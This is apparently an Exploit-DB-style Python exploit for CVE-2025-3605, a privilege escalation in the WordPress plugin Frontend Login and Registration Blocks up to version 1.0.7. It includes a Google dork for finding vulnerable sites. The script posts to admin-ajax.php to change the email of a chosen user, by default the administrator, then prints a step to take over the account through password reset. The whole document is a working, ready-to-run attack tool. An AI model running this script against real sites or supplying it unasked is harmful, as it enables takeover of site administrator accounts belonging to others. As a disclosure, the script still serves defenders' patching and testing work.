# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605
import requests
import argparse
import sys
def display_banner():
banner = """
_____ _____ ___ __ ___ ___ ____ __ __ ___
/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
"""
print(banner)
def suppress_ssl_warnings():
requests.packages.urllib3.disable_warnings()
def initialize_session():
new_session = requests.Session()
new_session.verify = False
new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
return new_session
def parse_input_args():
parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
return parser.parse_args()
def generate_payload(user, email):
return {
'action': 'flrblocksusersettingsupdatehandle',
'user_id': user,
'flr-blocks-email-update': email
}
def execute_exploit(session, target_url, payload):
try:
return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
except Exception as error:
print(f"Request error: {error}")
sys.exit(1)
def process_response(response):
if response.status_code == 200 and response.text.strip() != "0":
print(f"Exploit succeeded! Response: {response.text}")
print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
else:
print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")
def run_exploit():
display_banner()
suppress_ssl_warnings()
args = parse_input_args()
session = initialize_session()
payload = generate_payload(args.target_user, args.new_email)
response = execute_exploit(session, args.target, payload)
process_response(response)
if __name__ == "__main__":
run_exploit()